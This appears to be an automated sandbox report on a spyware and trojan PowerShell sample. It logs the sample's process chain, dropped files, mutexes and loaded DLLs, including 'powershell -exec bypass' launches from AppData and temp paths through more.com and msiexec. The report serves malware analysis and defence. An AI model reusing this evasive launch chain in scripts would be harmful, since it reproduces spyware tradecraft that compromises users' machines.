Source: nvdisps.dll.0.dr

Static PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)

Source: api-ms-win-crt-filesystem-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-multibyte-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-util-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-private-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-process-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-rtlsupport-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-conio-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-heap-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-timezone-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-convert-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-string-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-2-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-profile-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-sysinfo-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-math-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-locale-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-1.dll.0.dr	Static PE information: No import functions for PE file found
Source: api-ms-win-crt-environment-l1-1-0.dll.0.dr	Static PE information: No import functions for PE file found

Source: classification engine

Classification label: mal100.troj.spyw.evad.winPS1@14/60@2/2

Source: C:\Windows\SysWOW64\msiexec.exe

Code function: 8_2_02F190B0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

8_2_02F190B0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\suHHfJJJ.zip

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2008:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6932:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6924:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dbrqwtia.in4.ps1

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\gkzHdqfg.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe "C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe"
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Process created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.com
Source: C:\Windows\SysWOW64\more.com	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\more.com	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe "C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe "C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe"
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\ZZJTWAOIXLEHV8HOYD0ZL8WGES83EVQ.ps1"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe "C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Process created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.com	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\ZZJTWAOIXLEHV8HOYD0ZL8WGES83EVQ.ps1"	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskflowdataengine.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cdp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dsreg.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Section loaded: starburn.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Section loaded: qtcore4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Section loaded: qtgui4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Section loaded: qtnetwork4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Section loaded: qtxml4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Section loaded: msvcp100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Section loaded: msvcp100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Section loaded: msvcp100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Section loaded: dbgcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Section loaded: pla.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Section loaded: tdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Section loaded: starburn.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Section loaded: qtcore4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Section loaded: qtgui4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Section loaded: qtnetwork4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Section loaded: qtxml4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Section loaded: msvcp100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Section loaded: msvcp100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Section loaded: msvcp100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Section loaded: msvcp100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Section loaded: dbgcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Section loaded: pla.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Section loaded: tdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Section loaded: starburn.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Section loaded: qtcore4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Section loaded: qtgui4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Section loaded: qtnetwork4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Section loaded: qtxml4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Section loaded: msvcp100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Section loaded: msvcp100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Section loaded: msvcp100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Section loaded: msvcp100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Section loaded: dbgcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Section loaded: pla.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Section loaded: tdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File written: C:\Users\user\AppData\Roaming\QHUPRmIp\updater\manager\ks_tyres.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: gkzHdqfg.ps1

Static file information: File size 53742703 > 1048576

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Users\user\AppData\Roaming\QHUPRmIp\msvcr100.dll

Jump to behavior

Source:	Binary string: api-ms-win-core-util-l1-1-0.pdb source: powershell.exe, 00000000.00000002.1929469102.00000216025D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216025BD000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: powershell.exe, 00000000.00000002.1929469102.0000021600B8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600B5A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-core-synch-l1-1-0.pdb source: powershell.exe, 00000000.00000002.1929469102.000002160215B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.000002160212C000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: powershell.exe, 00000000.00000002.1929469102.00000216009F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.00000216009DA000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: powershell.exe, 00000000.00000002.1929469102.0000021600C18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1929469102.0000021600BE6000.00000004.00000800.00020000.00000000.sdmp
